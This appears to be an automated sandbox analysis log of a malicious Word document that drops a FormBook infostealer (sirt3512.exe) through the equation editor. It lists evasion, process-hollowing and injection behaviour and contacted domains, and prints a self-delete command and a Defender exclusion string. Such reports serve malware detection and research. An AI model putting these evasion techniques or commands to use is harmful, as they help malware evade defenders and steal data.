Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
Source: INQUIRY-PO3010773..EPR55804.doc ReversingLabs: Detection: 23%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\sirt3512.exe C:\Users\user\AppData\Roaming\sirt3512.exe
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process created: C:\Users\user\AppData\Roaming\sirt3512.exe C:\Users\user\AppData\Roaming\sirt3512.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\sirt3512.exe'
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\sirt3512.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: control.pdb source: sirt3512.exe, 00000005.00000002.2132218595.0000000000839000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: sirt3512.exe, control.exe

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Unpacked PE file: 4.2.sirt3512.exe.1220000.3.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Unpacked PE file: 4.2.sirt3512.exe.1220000.3.unpack
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_01225097 push ss; retf 4_2_012250A0
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_01224AEA push ebx; retf 4_2_01224B11
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B2DD9 push ecx; retf 4_2_001B2DDB
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B2DCF push ecx; retf 4_2_001B2DD1
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B069A push FFFFFFBAh; retf 4_2_001B069C
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_0057C8D4 push eax; retf 4_2_0057C8D8
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0041E041 pushfd ; iretd 5_2_0041E051
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_004170CB push edi; ret 5_2_004170CC
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0041D0D2 push eax; ret 5_2_0041D0D8
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0041D0DB push eax; ret 5_2_0041D142
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0041D085 push eax; ret 5_2_0041D0D8
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00416888 push FFFFFFFAh; ret 5_2_00416890
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0041D13C push eax; ret 5_2_0041D142
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00416C3E push ecx; retf 5_2_00416C3F
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0041DD3C push cs; ret 5_2_0041DD3D
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0041DD82 push ebp; retf 5_2_0041DD83
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00417628 push ds; iretd 5_2_0041762B
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_01225097 push ss; retf 5_2_012250A0
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_01224AEA push ebx; retf 5_2_01224B11
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0093DFA1 push ecx; ret 5_2_0093DFB4
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F8DFA1 push ecx; ret 7_2_01F8DFB4
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000FE041 pushfd ; iretd 7_2_000FE051
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000FD085 push eax; ret 7_2_000FD0D8
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000F70CB push edi; ret 7_2_000F70CC
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000FD0DB push eax; ret 7_2_000FD142
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000FD0D2 push eax; ret 7_2_000FD0D8
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000FD13C push eax; ret 7_2_000FD142
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000F7628 push ds; iretd 7_2_000F762B
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000F6888 push FFFFFFFAh; ret 7_2_000F6890
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000F6C3E push ecx; retf 7_2_000F6C3F
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000FDD3C push cs; ret 7_2_000FDD3D
Source: initial sample Static PE information: section name: .text entropy: 7.56086895782

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\sirtx[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\sirt3512.exe

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xE9
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: sirt3512.exe PID: 2644, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Roaming\sirt3512.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\sirt3512.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe RDTSC instruction interceptor: First address: 00000000000E98E4 second address: 00000000000E98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe RDTSC instruction interceptor: First address: 00000000000E9B5E second address: 00000000000E9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00409A90 rdtsc 5_2_00409A90
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1100 Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Roaming\sirt3512.exe TID: 2372 Thread sleep time: -102260s >= -30000s
Source: C:\Users\user\AppData\Roaming\sirt3512.exe TID: 2324 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\control.exe TID: 2444 Thread sleep time: -40000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\control.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Thread delayed: delay time: 102260
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000006.00000000.2097308661.00000000001F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.2103144355.0000000004234000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.2103167927.0000000004263000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: vmware
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000006.00000000.2103084772.00000000041AD000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000006.00000000.2097337474.0000000000231000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\control.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00409A90 rdtsc 5_2_00409A90
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0040ACD0 LdrLoadDll, 5_2_0040ACD0
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_009426F8 mov eax, dword ptr fs:[00000030h] 5_2_009426F8
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F926F8 mov eax, dword ptr fs:[00000030h] 7_2_01F926F8
Enables debug privileges
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\control.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 40.65.124.100 80
Source: C:\Windows\explorer.exe Domain query: www.869bernardilane.com
Source: C:\Windows\explorer.exe Domain query: www.363dahlia.com
Source: C:\Windows\explorer.exe Network Connect: 64.98.145.30 80
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Memory written: C:\Users\user\AppData\Roaming\sirt3512.exe base: 400000 value starts with: 4D5A
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Thread register set: target process: 1388
Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 1388
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Section unmapped: C:\Windows\SysWOW64\control.exe base address: B0000
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\sirt3512.exe C:\Users\user\AppData\Roaming\sirt3512.exe
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process created: C:\Users\user\AppData\Roaming\sirt3512.exe C:\Users\user\AppData\Roaming\sirt3512.exe
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\sirt3512.exe'
Source: explorer.exe, 00000006.00000000.2120233385.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000000.2120233385.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.2097308661.00000000001F5000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.2120233385.00000000006F0000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Queries volume information: C:\Users\user\AppData\Roaming\sirt3512.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2353252437.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2353301076.0000000000290000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2132134881.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2132063520.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2094658238.0000000003F49000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2092914206.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2132009638.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2353128733.00000000000E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.sirt3512.exe.3f494f0.5.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2353252437.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2353301076.0000000000290000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2132134881.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2132063520.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2094658238.0000000003F49000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2092914206.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2132009638.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2353128733.00000000000E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.sirt3512.exe.3f494f0.5.raw.unpack, type: UNPACKEDPE